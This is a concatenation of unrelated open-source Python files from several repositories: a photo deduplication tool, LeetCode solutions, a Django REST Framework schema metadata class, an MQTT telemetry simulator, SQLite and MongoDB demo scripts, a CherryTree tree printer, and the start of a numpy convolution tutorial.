LibraryType, Library, Photo, Duplicate, HashLibrary, HashAlgoritm, Encoding, \
get_hash_algo, fetch_or_initialize_db
DATABASE_DEFAULT_PATH = "assets/duplicates.db"
SUPPORTED_IMAGE_FORMATS = set(
['JPEG', 'PNG', 'BMP', 'MPO', 'PPM', 'TIFF', 'GIF', 'SVG', 'PGM', 'PBM']
)
def parse_args():
parser = ArgumentParser(description='Deduplicate photo albums')
parser.add_argument('-d', '--db_path',
type=str,#check_path_existence("database file"),
action='store',
default=DATABASE_DEFAULT_PATH,
help=f"database file path where results persist (defaults to {DATABASE_DEFAULT_PATH})")
parser.add_argument('paths',
metavar='path',
type=check_path_existence('photo library path'),
nargs='*',
action='extend',
help="path to .photoslibrary or photo directory")
parser.add_argument('-v', '--verbose',
action='store_true',
help="verbose logging")
parser.add_argument('--dry-run',
action='store_true',
help="do not write or encode. list what operations would be performed")
return parser.parse_args()
def check_path_existence(arg_name):
def check_name(path):
abspath = os.path.abspath(os.path.expanduser(path))
if not os.path.exists(abspath):
logging.error(f"{arg_name} does not exist: {path}")
exit(55)
return abspath
return check_name
def fetch_libraries(paths, db):
# TODO @j000shDotCom separate directories from apple photos
return [fetch_or_initialize_library(path, db) for path in paths], []
def fetch_or_initialize_library(library_path, db):
library_name = os.path.basename(library_path)
conditions = or_(Library.path == library_path, Library.name == library_name)
library = db.query(Library).filter(conditions).first()
if not library:
logging.info(f"Creating Library: ${library_name}")
library = Library(name=library_name, path=library_path, type=LibraryType.apple_photos)
db.add(library)
db.commit()
return library
def fetch_photos(library):
photosdb = osxphotos.PhotosDB(library.path)
images = photosdb.photos(images=True, movies=False)
videos = [] # photosdb.photos(images=False, movies=True)
albums = {} # photosdb.albums_as_dict
photos = [ Photo(p, library) for p in filter(is_image_supported, images) ]
logging.info(f"Found {len(photos)} photos, {len(videos)} videos, {len(albums)} albums")
return (photos, videos, albums)
def is_image_supported(photo):
file_extension = os.path.splitext(photo.path)[1]
return file_extension[1:].upper() in SUPPORTED_IMAGE_FORMATS
def persist_photos(photos, db):
logging.info(f"INSERTING {len(photos)} NEW PHOTOS")
db.add_all(photos)
db.commit()
# TODO fix the re-insertion of photos
# conditions = Photo.uuid.in_([p.uuid for p in photos])
# db_photos = { p[0] for p in db.query(Photo.uuid).filter(conditions).all() }
# new_photos = [ p for p in photos if p.uuid not in db_photos ]
# if new_photos:
# logging.info(f"INSERTING {len(photos)} NEW PHOTOS")
# db.add_all(photos)
# db.commit()
def persist_duplicates(library, duplicates, encodings, db):
logging.info("Persisting duplicates")
# get fresh photo data from the database
photos = db.query(Photo).filter_by(library_id=library.id).all()
dupes = db.query(Duplicate).filter_by(library_id=library.id).all()
id_photos = { p.id: p for p in photos }
keyed_photos = { p.abspath(): p for p in photos }
org = {}
for d in dupes:
temp = org[d.hash_name] if d.hash_name in org else {}
org[d.hash_name] = temp
op = id_photos[d.orig_photo_id]
op_path = op.abspath()
dp = id_photos[d.dup_photo_id]
temp = org[d.hash_name][op_path] if op_path in org[d.hash_name].keys() else set()
org[d.hash_name][op_path] = temp
org[d.hash_name][op_path].add(dp.abspath())
db_duplicates = []
for hash_name, photos in duplicates.items():
for orig_photo_path, photo_duplicates in photos.items():
existingpaths = org[hash_name][orig_photo_path] if org and org[hash_name] and orig_photo_path in org[hash_name] else set()
for dup_photo_path, score in photo_duplicates:
if dup_photo_path in existingpaths:
continue
dupe = Duplicate(
library_id=library.id,
orig_photo_id=keyed_photos[orig_photo_path].id,
dup_photo_id=keyed_photos[dup_photo_path].id,
hash_name=hash_name,
hash_value=keyed_photos[orig_photo_path].hashes[hash_name],
score=score
)
db_duplicates.append(dupe)
if db_duplicates:
logging.info(f"INSERTING {len(db_duplicates)} NEW DUPLICATES")
db.add_all(db_duplicates)
db.commit()
def main():
args = parse_args()
library_paths = args.paths
if not library_paths:
logging.error('no libraries specified')
last_library_path = osxphotos.utils.get_last_library_path()
system_library_path = osxphotos.utils.get_system_library_path()
resp = input(f"use last .photoslibrary ({last_library_path}) [Y/n] ")
if not resp or resp.lower() == 'y':
library_paths.append(last_library_path)
else:
exit(2)
db_session = fetch_or_initialize_db(args.db_path)
applephotos, directories = fetch_libraries(library_paths, db_session)
photos, videos, albums = fetch_photos(applephotos[0]) # TODO
# TODO replace these dry-run guards with decorators
if args.dry_run:
logging.info('[dry-run] skipping photo persistence')
else:
logging.info('Persisting photo data')
persist_photos(photos, db_session)
hasher = Hasher()
if args.dry_run:
logging.info('[dry-run] skipping image encoding')
else:
logging.info("Encoding images with imagededup")
imagededup_encodings = hasher.imagededup_encode(photos)
logging.info("Encoding images with imagehash")
imagehash_encodings = hasher.imagehash_encode(photos)
logging.info('Persisting photo encodings')
encodings = []
for photo in photos:
photo_id = photo.id
for hash_name, value in imagededup_encodings[photo_id].items():
enc = Encoding(photo_id=photo_id, hash_library=HashLibrary.imagededup, \
algorithm=get_hash_algo(hash_name), value=value)
encodings.append(enc)
for hash_name, value in imagehash_encodings[photo_id].items():
enc = Encoding(photo_id=photo_id, hash_library=HashLibrary.imagehash, \
algorithm=get_hash_algo(hash_name), value=value)
encodings.append(enc)
db_session.add_all(encodings)
db_session.commit()
if args.dry_run:
logging.info('[dry-run] skipping deduplication check and persistence')
else:
pass
# TODO make this smarter AND ASYNC
# logging.info("Deduplicating images")
# duplicates = hasher.find_duplicates(photos)
# persist_duplicates(library, duplicates, encodings, db_session)
if __name__ == "__main__":
main()
``` |
{
"source": "josh-dp/LeetCode-Solutions",
"score": 4
} |
#### File: LeetCode-Solutions/Python/1277. CountSquareSubmatricesWithAllOnes.py
```python
def count_squares(matrix):
# dp to store the maximum no. of squares possible at that place
dp = [[0 for i in range(len(matrix[0]))] for j in range(len(matrix))]
# ans stores the total no. of squares formed.
ans = 0
# Looping through each cell of the given matrix.
for i in range(len(matrix)):
for j in range(len(matrix[0])):
# Corner cases as only square of dimensions [1*1] can be formed at 0th row and 0th column.
if i == 0 or j == 0:
dp[i][j] = matrix[i][j]
else:
if matrix[i][j] == 0:
dp[i][j] = 0
else:
# Taking the minimum of the top, left, and top-left neighbours and adding one (for the [1*1] square formed).
dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1
# updating our answer.
ans += dp[i][j]
return ans
# This code is contributed by <NAME>.
# Example :
matrix = [
[0, 1, 1, 1],
[1, 1, 1, 1],
[0, 1, 1, 1]
]
print(count_squares(matrix))
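# Expected output for the example above: 15
# (ten 1x1 squares, four 2x2 squares and one 3x3 square)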
```
#### File: LeetCode-Solutions/Python/longestMountatinSubarray..py
```python
def longest_mountain_subarray(a):
max_len = 0
for i in range(1, len(a) - 1):
# Finding peak.
if a[i] > a[i + 1] and a[i] > a[i - 1]:
# pointer which will move to the left.
l = i
# pointer which will move to right.
r = i
while l > 0 and a[l] > a[l - 1]:
l -= 1
while r < len(a) - 1 and a[r] > a[r + 1]:
r += 1
# calculating max length.
max_len = max(max_len, (r - l) + 1)
return max_len
# Example test case.
a = [2, 1, 4, 7, 3, 2, 5]
print(longest_mountain_subarray(a))
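# Expected output for the example above: 5 (the mountain [1, 4, 7, 3, 2])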
``` |
{
"source": "joshdrake/django-rest-framework-json-schema",
"score": 2
} |
#### File: django-rest-framework-json-schema/rest_framework_json_schema/metadata.py
```python
from collections import OrderedDict
from django.utils.encoding import force_text
from rest_framework import metadata, serializers
from rest_framework.utils.field_mapping import ClassLookupDict
from .serializers import ModelClassSerializer
class JSONSchemaMetadataMixin(object):
label_lookup = ClassLookupDict({
serializers.Field: 'object',
serializers.BooleanField: 'boolean',
serializers.CharField: 'string',
serializers.URLField: 'string',
serializers.EmailField: 'string',
serializers.RegexField: 'string',
serializers.SlugField: 'string',
serializers.IntegerField: 'integer',
serializers.FloatField: 'number',
serializers.DecimalField: 'number',
serializers.DateField: 'string',
serializers.DateTimeField: 'string',
serializers.ChoiceField: 'enum',
serializers.FileField: 'string',
serializers.PrimaryKeyRelatedField: 'integer',
serializers.SlugRelatedField: 'enum',
serializers.HyperlinkedRelatedField: 'string',
serializers.HyperlinkedIdentityField: 'string',
})
def __init__(self, *args, **kwargs):
super(JSONSchemaMetadataMixin, self).__init__(*args, **kwargs)
def get_serializer_info(self, serializer):
opts = serializer.Meta.model._meta
schema = {
'rels': {},
'links': [],
'properties': OrderedDict(),
'required': [],
}
for field_name, field in serializer.fields.items():
if getattr(field, 'read_only', False):
continue
schema['properties'][field_name] = self.get_field_info(field)
if getattr(field, 'required', False):
schema['required'].append(field_name)
if isinstance(field, serializers.RelatedField):
link = {
'rel': field_name,
}
if isinstance(field, serializers.HyperlinkedRelatedField):
link['href'] = "{{{}}}".format(field_name)
schema['links'].append(link)
schema['rels'][field_name] = ModelClassSerializer(field.queryset.model).data
if isinstance(field, serializers.Serializer):
related_schema = self.get_serializer_info(field)
field_info = {
'type': 'object',
'properties': related_schema['properties'],
}
if isinstance(field, serializers.ListSerializer):
field_info = {
'items': field_info,
'type': 'array',
}
schema['properties'][field_name] = field_info
return schema
def get_field_info(self, field):
"""
Given an instance of a serializer field, return a dictionary
of metadata about it.
"""
field_info = OrderedDict()
field_info['type'] = self.label_lookup[field]
attribute_map = {
'label': 'title',
'help_text': 'description',
}
format_map = ClassLookupDict({
serializers.Field: None,
serializers.URLField: 'uri',
serializers.EmailField: 'email',
serializers.DateTimeField: 'date-time',
serializers.DateField: 'date-time',
serializers.FileField: 'file',
serializers.HyperlinkedRelatedField: 'uri',
serializers.HyperlinkedIdentityField: 'uri',
})
for attr in ['min_length', 'max_length', 'label', 'help_text']:
dest = attribute_map.get(attr, attr)
value = getattr(field, attr, None)
if value is not None and value != '':
field_info[dest] = force_text(value, strings_only=True)
format = format_map[field]
if format:
field_info['format'] = format
if hasattr(field, 'choices') and not isinstance(field, serializers.RelatedField):
field_info['enum'] = field.choices.keys()
field_info['choices'] = [
{'value': value, 'display_name': display_name}
for value, display_name in field.choices.iteritems()
]
if isinstance(field, serializers.RelatedField):
if isinstance(field, serializers.ListSerializer):
field_info['items'] = {'type': field_info['type']}
if 'format' in field_info:
field_info['items']['format'] = field_info.pop('format')
field_info['type'] = 'array'
return field_info
class JSONSchemaMetadata(JSONSchemaMetadataMixin, metadata.SimpleMetadata):
pass
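# Illustrative usage sketch (assumes the package is importable as
# rest_framework_json_schema): enable this metadata class per-view with
# metadata_class = JSONSchemaMetadata, or globally via
# REST_FRAMEWORK = {"DEFAULT_METADATA_CLASS":
# "rest_framework_json_schema.metadata.JSONSchemaMetadata"};
# an OPTIONS request on the view then returns the schema built above.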
``` |
{
"source": "joshdreagan/iot-demo",
"score": 2
} |
#### File: iot/pumpjack/sim.py
```python
import click
import json
import paho.mqtt.publish as publish
import random
import shutil
import time
from urllib.parse import urlparse
now = lambda: int(round(time.time() * 1000))
def __msg(topic, payload, qos=0, retain=False):
return { "topic": topic, "payload": payload, "qos": qos, "retain": retain }
def __payload(location_id, rig_id, time, type, data=None):
return { "locationId": location_id, "rigId": rig_id, "time": time, "source": "pumpjack", "type": type, "data": (data if data!=None else {}) }
def __heartbeat(location_id, rig_id, time):
data = None
return __payload(location_id, rig_id, time, "heartbeat", data)
def __tachometer(location_id, rig_id, time, speed, speed_variance):
data = { "rpm": random.uniform(max(0, speed - speed_variance), max(0, speed + speed_variance)) }
return __payload(location_id, rig_id, time, "tachometer", data)
def __piezo(location_id, rig_id, time, frequency, frequency_variance):
data = { "vibrationFrequency": random.uniform(max(0, frequency - frequency_variance), max(0, frequency + frequency_variance)) }
return __payload(location_id, rig_id, time, "piezo", data)
@click.command(context_settings={ "max_content_width": shutil.get_terminal_size()[0] })
@click.option("--location-id", help="The unique identifier for the location.")
@click.option("--rig-id", help="The unique identifier for the rig.")
@click.option("--broker-username", help="The username for the MQTT broker.")
@click.option("--broker-password", hide_input=True, prompt=True, confirmation_prompt=True, help="The password for the MQTT broker.")
@click.option("--telemetry-topic", default="iot.telemetry", show_default=True, help="The topic to send the telemetry data to.")
@click.option("--telemetry-frequency", type=click.IntRange(min=1, max=None), default=5, show_default=True, help="The frequency (in seconds) of the telemetry messages.")
@click.option("--buffer-timeout", type=click.IntRange(min=1000, max=None), default=10000, show_default=True, help="The time (in millis) to wait before sending each batch of messages to the MQTT broker.")
@click.option("--tachometer-enabled", is_flag=True, default=True, show_default=True, help="Whether or not to send tachometer sensor telemetry messages.")
@click.option("--tachometer-rotation-speed", type=click.FloatRange(min=0, max=None), default=12.0, show_default=True, help="The rotations per minute for the tachometer.")
@click.option("--tachometer-rotation-speed-variance", type=click.FloatRange(min=0, max=None), default=1.0, show_default=True, help="The variance of the rotations per minute for the tachometer.")
@click.option("--piezo-enabled", is_flag=True, default=True, show_default=True, help="Whether or not to send piezoo sensor telemetry messages.")
@click.option("--piezo-vibration-frequency", type=click.FloatRange(min=0.0, max=None), default=1000.0, show_default=True, help="The frequence (in Hz) of the vibrations for the piezo sensor.")
@click.option("--piezo-vibration-frequency-variance", type=click.FloatRange(min=0.0, max=None), default=1.0, show_default=True, help="The variance (in Hz) of the vibrations for the piezo sensor.")
@click.option("--verbose", is_flag=True, default=False, show_default=True, help="Enable verbose logging output")
@click.argument("broker_url", required=True)
def main(location_id, rig_id, broker_username, broker_password, telemetry_topic, telemetry_frequency, buffer_timeout, tachometer_enabled, tachometer_rotation_speed, tachometer_rotation_speed_variance, piezo_enabled, piezo_vibration_frequency, piezo_vibration_frequency_variance, verbose, broker_url):
broker_url_parts = urlparse(broker_url)
broker_auth = { "username": broker_username, "password": <PASSWORD> }
last_run = now()
msgs = list()
while True:
current_run = now()
if verbose:
click.echo("Woke up. Gathering telemetry data...")
click.echo("Last run: {}, Current Run: {}".format(last_run, current_run))
msg = __msg(telemetry_topic, json.dumps(__heartbeat(location_id, rig_id, current_run)))
if verbose:
click.echo(msg)
msgs.append(msg)
if tachometer_enabled:
msg = __msg(telemetry_topic, json.dumps(__tachometer(location_id, rig_id, current_run, tachometer_rotation_speed, tachometer_rotation_speed_variance)))
if verbose:
click.echo(msg)
msgs.append(msg)
if piezo_enabled:
msg = __msg(telemetry_topic, json.dumps(__piezo(location_id, rig_id, current_run, piezo_vibration_frequency, piezo_vibration_frequency_variance)))
if verbose:
click.echo(msg)
msgs.append(msg)
if current_run >= (last_run + buffer_timeout):
click.echo("Publishing {} messages to {}:{}...".format(len(msgs), broker_url_parts.hostname, broker_url_parts.port))
publish.multiple(msgs, hostname=broker_url_parts.hostname, port=broker_url_parts.port, auth=broker_auth, client_id="{}-{}".format(location_id, rig_id))
click.echo("Done.")
last_run = now()
msgs.clear()
time.sleep(telemetry_frequency)
if __name__ == "__main__":
main()
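# Illustrative invocation (hypothetical broker URL and identifiers):
# python sim.py --location-id well-07 --rig-id rig-3 --broker-username iot \
# mqtt://broker.example.com:1883
# The broker password is prompted for; readings are gathered every
# --telemetry-frequency seconds and published roughly every --buffer-timeout ms.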
``` |
{
"source": "joshdsolis/DS-Unit-3-Sprint-1-Software-Engineering",
"score": 4
} |
#### File: joshdsolis/DS-Unit-3-Sprint-1-Software-Engineering/acme.py
```python
import random
class Product:
"""Class for Acme's Product"""
def __init__(self, name, price = 10, weight = 20, flammability = 0.5,
identifier = None):
self.name = name
self.price = price
self.weight = weight
self.flammability = flammability
# Default arguments are evaluated once at definition time, so generate a
# fresh identifier per instance here rather than in the signature.
self.identifier = identifier if identifier is not None else random.randint(1000000, 9999999)
def stealability(self):
ratio = self.price/float(self.weight)
if ratio < 0.5:
return "Not so stealable..."
elif ratio >= 0.5 and ratio < 1:
return "Kinda stealable."
else:
return "Very stealable!"
def explode(self):
final = self.flammability * self.weight
if final < 10:
return "...fizzle"
elif final >= 10 and final < 50:
return "...boom!"
else:
return "...BABOOM!!"
class BoxingGlove(Product):
def __init__(self, name, price = 10, weight = 10, flammability = 0.5,
identifier = None):
self.name = name
self.price = price
self.weight = weight
self.flammability = flammability
# Same fix as Product: avoid sharing one identifier across all instances.
self.identifier = identifier if identifier is not None else random.randint(1000000, 9999999)
def explode(self):
return "...it's a glove"
def punch(self):
if self.weight < 5:
return "That tickles"
elif self.weight >= 5 and self.weight < 15:
return "Hey that hurt!"
else:
return "OUCH!"
``` |
{
"source": "joshdsolis/DS-Unit-3-Sprint-2-SQL-and-Databases",
"score": 4
} |
#### File: joshdsolis/DS-Unit-3-Sprint-2-SQL-and-Databases/demo_data.py
```python
import sqlite3
sl_conn = sqlite3.connect('../SQLandDatabases/demo_data.sqlite3')
create_table = """ CREATE TABLE demo (
s varchar(30),
x int,
y int
); """
sl_curs = sl_conn.cursor()
sl_curs.execute(create_table)
sl_curs.execute(""" INSERT INTO demo (
s, x, y) VALUES ("'g'", 3, 9)
;""")
sl_curs.execute(""" INSERT INTO demo (
s, x, y) VALUES ("'v'", 5, 7)
;""")
sl_curs.execute(""" INSERT INTO demo (
s, x, y) VALUES ("'f'", 8, 7)
;""")
sl_conn.commit()
rows_count_query = """SELECT COUNT(*)
FROM demo;"""
greater_than_5_query = """SELECT COUNT(*)
FROM demo
WHERE demo.x >= 5
AND demo.y >= 5;"""
unique_y_query = """SELECT COUNT(DISTINCT(demo.y))
FROM demo;"""
def query(x):
print(sl_curs.execute(x).fetchall())
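# Example usage of the helper above (each prints the raw fetchall() result):
# query(rows_count_query) # -> [(3,)]
# query(greater_than_5_query) # -> [(2,)]
# query(unique_y_query) # -> [(2,)]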
```
#### File: DS-Unit-3-Sprint-2-SQL-and-Databases/module3-nosql-and-document-oriented-databases/rpg_to_mongo.py
```python
import sqlite3
import pymongo
# Get the data from sqlite3
sl_conn = sqlite3.connect('../joshdsolis/rpg_db.sqlite3')
results = sl_conn.execute('SELECT * FROM charactercreator_character;').fetchall()
# Data to dict form
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
sl_conn.row_factory = dict_factory
curs = sl_conn.cursor()
results = curs.execute('SELECT * FROM charactercreator_character;').fetchall()
# Connecting to MongoDB
connection_string = "mongodb://UserJosh:<TODO>@cluster0-shard-00-00-5wkdx.mongodb.net:27017,cluster0-shard-00-01-5wkdx.mongodb.net:27017,cluster0-shard-00-02-5wkdx.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true"
client = pymongo.MongoClient(connection_string)
db = client.test
for result in results:
db.test.insert_one(result)
print(list(db.test.find()))
``` |
{
"source": "joshdsolis/lambdata",
"score": 3
} |
#### File: lambdata/lambdata_joshdsolis/lambdata_tests.py
```python
import unittest
import numpy as np
import pandas as pd
from __init__ import *
# testing __init__ functions
class LambTest(unittest.TestCase):
"""Test lambdata_joshdsolis functions"""
# def test_checknulls(self):
# df = pd.DataFrame(np.ones(100))
# self.assertEqual(check_nulls(df).tolist(), df.isna().sum()).tolist()
# Testing more_rows functions in init
def test_morerows(self):
df = pd.DataFrame(np.ones(100))
more_rows(df, 100)
self.assertEqual(df.shape, (200, 1))
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshduf/DisinformationNetworks",
"score": 3
} |
#### File: joshduf/DisinformationNetworks/preProcess.py
```python
import csv
import numpy as np
import random
import re
# Non-ASCII values are ignored to ensure the model doesn't
# use artifacts from the encoding process to classify tweets
# as I have no control over the methods NBCNews used to create
# it's csv of positive examples.
# Only time and tweet text are used and are tagged
def getFile(file, MAX):
STWEET = "<SW>"
ETWEET = "<EW>"
SHOUR = "<SH>"
EHOUR = "<EH>"
STEXT = "<ST>"
ETEXT = "<ET>"
lines = []
with open(file, "r", encoding="utf-8") as f:
data = csv.reader(f)
for _, row in zip(range(MAX), data):
time = row[1].encode('ascii',errors='ignore').decode()
text = row[2].encode('ascii',errors='ignore').decode()
lines.append(STWEET + SHOUR + time + EHOUR + STEXT + text + ETEXT + ETWEET)
f.close()
return lines
# To be fed into a CNN, all examples are padded to the length of the
# longest example
def pad(data):
longest = len(max(data, key=len))
padded = [row.ljust(longest, ">") for row in data]
return padded
# Tweets are grouped together. This assumes they were organized by
# user first, then time. The dataset used had on average hundreds
# of tweets per user and the group size was <= 20 so the possibility
# of a group consisting of tweets from 2 different users doesn't
# significantly affect the outcome of classification, so such groups are ignored.
def combine(data, GROUPSIZE):
START = "<S>"
END = "<E>"
newData = []
for newRow in range(len(data)//GROUPSIZE):
combined = ""
for oldRow in range(newRow*GROUPSIZE, (newRow + 1)*GROUPSIZE):
combined += data[oldRow] + " "
combined = START + " " + combined + END
newData.append(combined)
return newData
# Takes positive and negative examples and creates input and output vectors
def readData(POSFILE, NEGFILE, NEGFILE2, MAXPOS, MAXNEG, MAXNEG2, GROUP):
pos = getFile(file=POSFILE, MAX=MAXPOS)
neg = getFile(file=NEGFILE, MAX=MAXNEG) + getFile(file=NEGFILE2, MAX=MAXNEG2)
pos = combine(pos, GROUP)
neg = combine(neg, GROUP)
y = [1 for line in pos] + [0 for line in neg]
x = pad(pos + neg)
return (x, y)
# Creates a dictionary mapping characters to an associated index
def getIndexes(x):
letters = set()
for line in x:
letters.update(line)
indexes = dict((letter, index) for index, letter in enumerate(letters))
return indexes
# Turns character vector into vector of character indexes
def vectorize(x, y, indexes):
Y = np.array(y)
X = [[indexes.get(letter, -1) for letter in line] for line in x]
return (X, Y)
# Splits data into test and train sections
def splitData(X, Y, SPLITSIZE):
x_train = np.array(X[:SPLITSIZE])
x_test = np.array(X[SPLITSIZE:])
y_train = np.array(Y[:SPLITSIZE])
y_test = np.array(Y[SPLITSIZE:])
return (x_train, y_train), (x_test, y_test)
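# Illustrative end-to-end sketch (hypothetical file names and limits; any
# shuffling before the train/test split is assumed to happen elsewhere):
# x, y = readData("troll_tweets.csv", "regular_tweets.csv", "news_tweets.csv",
# MAXPOS=20000, MAXNEG=10000, MAXNEG2=10000, GROUP=20)
# indexes = getIndexes(x)
# X, Y = vectorize(x, y, indexes)
# (x_train, y_train), (x_test, y_test) = splitData(X, Y, SPLITSIZE=int(0.8 * len(X)))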
``` |
{
"source": "joshdunnlime/better-python-string-sql",
"score": 4
} |
#### File: better-python-string-sql/docs/demo.py
```python
import sqlite3
DATASET = [
("Tencho", "2018-12-03"),
("Bessho", "2018-12-03"),
("Emoto", "2020-12-03"),
("Gamo", "2020-12-03"),
("Funakoshi", "2020-12-03"),
("Funakoshi", "2020-12-03"),
("Doigaki", "2020-12-03"),
("Doigaki", "2020-20-03"),
("Chikura", "2020-12-03"),
("Akabane", "2020-12-03"),
]
def main():
conn = sqlite3.connect(":memory:")
conn.executescript(
"""
DROP TABLE IF EXISTS foobar;
CREATE TABLE foobar (
last_name TEXT NOT NULL,
start_day TEXT NOT NULL
);
"""
)
conn.executemany("INSERT INTO foobar VALUES (?, ?)", DATASET)
query = """
SELECT last_name,
start_day,
COUNT(*) AS num_entries
FROM foobar
WHERE start_day >= '2019-01-01'
GROUP BY last_name, start_day
ORDER BY num_entries DESC
LIMIT 10;
"""
print(conn.execute(query).fetchall())
if __name__ == "__main__":
main()
``` |
{
"source": "joshedler/ct2ad",
"score": 4
} |
#### File: joshedler/ct2ad/ct2ad.py
```python
def sql_get_tables(con):
'''
Print the tables found in the SQLite database.
:param con: sqlite3 connection object
:return: returns nothing
'''
c = con.cursor()
c.execute('SELECT name from sqlite_master where type= "table"')
print('found tables:')
print(f' {c.fetchall()}')
def sql_get_all_nodes(con):
'''
Get all nodes from the CherryTree database.
:param con: sqlite3 connection object
:return: returns a dictionary, with keys being node_id and values being
the original tuple row from the database (node_id, name, txt)
'''
c = con.cursor()
c.execute('SELECT node_id, name, txt from node')
# 'rows' are of type list
# each 'row' is of type tuple
rows = c.fetchall()
print(f'loaded {len(rows)} total nodes...')
results = { }
for row in rows:
results[row[0]] = row
return results
def sql_get_all_children(con):
'''
Get all children from the CherryTree database.
:param con: sqlite3 connection object
:return: returns the children as a list of tuple(node_id, father_id, sequence)
'''
c = con.cursor()
c.execute('SELECT node_id, father_id, sequence from children')
# 'rows' are of type list
# each 'row' is of type tuple
rows = c.fetchall()
print(f'loaded {len(rows)} total children...')
return rows
def sql_get_child_by_node_id(con, node_id):
'''
Get the node with matching node_id from the CherryTree database.
:param con: sqlite3 connection object
:param node_id: the node_id to return
:return: returns a list of tuple rows from the database (node_id, name, txt)
'''
c = con.cursor()
a = (node_id,)
c.execute('SELECT node_id, father_id, sequence FROM children WHERE node_id = ?', a)
# 'rows' are of type list
# each 'row' is of type tuple
rows = c.fetchall()
return rows
def expand_child(child, all_nodes):
'''
Given a child tuple, return the matching node_id as a dictionary.
:param child: a child tuple(node_id, father_id, sequence)
:param all_nodes: the dictionary of all nodes from the database
:return: returns a node as a dictionary object with keys
'node' as tuple (node_id, name, txt),
'father' as tuple (node_id, name, txt), and
'seq' as integer
'''
node = all_nodes[child[0]]
father = all_nodes[child[1]] if child[1] > 0 else None
seq = child[2]
return {'node': node, 'father': father, 'seq': seq}
def get_father_for_node(node, all_children, all_nodes):
'''
Find the father for a given node.
:param node: the starting node for which the father is desired
:param all_children: the list of all children from the database
:param all_nodes: the dictionary of all nodes from the database
:return: returns the father node (node_id, name, txt) if there is one or None
'''
node_id = get_node_id(node)
for c in all_children:
if c[0] == node_id:
xc = expand_child(c, all_nodes)
return get_expanded_child_father(xc)
return None
def get_expanded_child_node(xc):
return xc['node']
def get_expanded_child_father(xc):
return xc['father']
def get_expanded_child_seq(xc):
return xc['seq']
def get_node_txt(node):
'''
Returns the txt field from a node tuple (node_id, name, txt)
:param node: a node tuple (node_id, name, txt)
:return: returns the string representing the txt field
'''
return node[2]
def get_node_name(node):
'''
Returns the name field from a node tuple (node_id, name, txt)
:param node: a node tuple (node_id, name, txt)
:return: returns the string representing the name field
'''
return node[1]
def get_node_id(node):
'''
Returns the node_id field from a node tuple (node_id, name, txt)
:param node: a node tuple (node_id, name, txt)
:return: returns the node_id field
'''
return node[0]
def dig(father, all_children, all_nodes, level):
'''
Given a father, recursively dig through the children, yielding(expanded_child_node, level) along the way.
:param father: a father as an "expanded child" dictionary node with keys 'node', 'father', and 'seq'
:param all_children: the list of all children from the database
:param all_nodes: the dictionary of all nodes from the database
:level: an integer, beginning with 1, representing the indent level for nice output
:return: returns nothing
'''
father_id = father['node'][0]
children = list(filter(lambda c: c[1] == father_id, all_children))
xc_list = []
for child in children:
xc = expand_child(child, all_nodes)
xc_list.append(xc)
for xc in sorted(xc_list, key=sequence_order):
yield(xc, level)
for xc_n, l in dig(xc, all_children, all_nodes, level+1):
yield(xc_n, l)
def sequence_order(expanded_child):
'''
A function allowing sorted() to iterate over a list of expanded_child dictionary objects in the proper sequence.
'''
return expanded_child['seq']
```
#### File: joshedler/ct2ad/tree.py
```python
import argparse
import colorama
from colorama import Fore, Back, Style
import sqlite3
from ct2ad import *
def print_xc_node(xc_node, level):
'''
Print the node information to the console in a nice format
'''
indent = '--' * level
s = get_expanded_child_seq(xc_node)
n = get_expanded_child_node(xc_node)
print(f'{Style.DIM}|{indent} {Style.NORMAL}{s:03}: {Style.BRIGHT+Fore.YELLOW}\'{get_node_name(n)}\' {Fore.RESET}{Style.DIM}: [node_id = {get_node_id(n)}]')
# setup argument parsing...
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('sqlite3_db', action='store')
args = parser.parse_args()
colorama.init(autoreset=True)
# load the database and party on!
con = sqlite3.connect(args.sqlite3_db)
sql_get_tables(con)
# all_nodes are a dict with each key being the unique node_id
all_nodes = sql_get_all_nodes(con)
# all_children are a list of tuples
all_children = sql_get_all_children(con)
xc_roots = []
for child in all_children:
xc_root = expand_child(child, all_nodes)
if get_expanded_child_father(xc_root) == None: xc_roots.append(xc_root)
print()
count = 0
for xc_root in sorted(xc_roots, key=sequence_order):
count = count + 1
print_xc_node(xc_root, 0)
for xc, level in dig(xc_root, all_children, all_nodes, 1):
print_xc_node(xc, level)
count = count + 1
print(f'\n{count} nodes iterated over')
``` |
{
"source": "JoshEHenderson/Convolution-Basics-Numpy",
"score": 4
} |
#### File: JoshEHenderson/Convolution-Basics-Numpy/Convolution_Basics.py
```python
import sys #system import
import numpy as np #for handling arrays
import matplotlib.pyplot as plt #for plotting images
import matplotlib.image as mpimg #for reading images
DIR = "" #Enter file location of image to be processed here
def pad(img, num): #adds layers of zeros so that filter can detect border features
w = img.shape[0] #image width
h = img.shape[1] #image height
output = np.zeros((w+num*2, h+num*2)) #output array, initialized to zeros
for r in range(h+2):
for c in range(w+2):
if r<num or c<num or r>h+num-1 or c>w+num-1:
output[c,r] = 0 #add a zero to the first num and last num rows/columns
else:
output[c,r] = img[c-num,r-num] #everything else is the same
return output
def ReLU(img): #helps with image output - turns negative numbers into zeros
w = img.shape[0] #image width
h = img.shape[1] #image height
output = np.zeros((w, h)) #output array, initialized to zeros
for r in range(h):
for c in range(w):
output[c,r]= max(img[c,r], 0) #max between current value and 0 (0>negative number)
return output
def maxPool(img, sz=2, str=2): #max pooling function for downsizing; sz = window size; str = stride
w = img.shape[0] #image width
h = img.shape[1] #image height
output = np.zeros((int((w-sz+1)/str), int((h-sz+1)/str))) #output array, initialized to zeros
if output.shape[0] < 1: #make sure we're not going to get rid of the image
print("image is not big enough to pool with given pool size and stride")
return img
outR = 0 #for keeping track of row on output
for r in np.arange(0, h-sz-1, str): #rows from 0 to h-sz-1 with increments of str
outC = 0 #for keeping track of column on output
for c in np.arange(0, w-sz-1, str): #columns from 0 to w-sz-1 with increments of str
output[outC, outR] = np.max(img[c:c+sz, r:r+sz]) #maximum from the current window
outC += 1
outR += 1
return output
def invertImg(img):
for r in range(img.shape[1]): #moving down the image
for c in range(img.shape[0]): #moving across the image
img[c,r] = 1-img[c,r] #swap the large and small values (all are in range [0-1])
return img
def convolution(img, filt, s=1): #convolution function (feature detection)
img = pad(img, int((filt.shape[1]-1)/2)) #pad the image with the above pad function
w = img.shape[0] #image width
h = img.shape[1] #image height
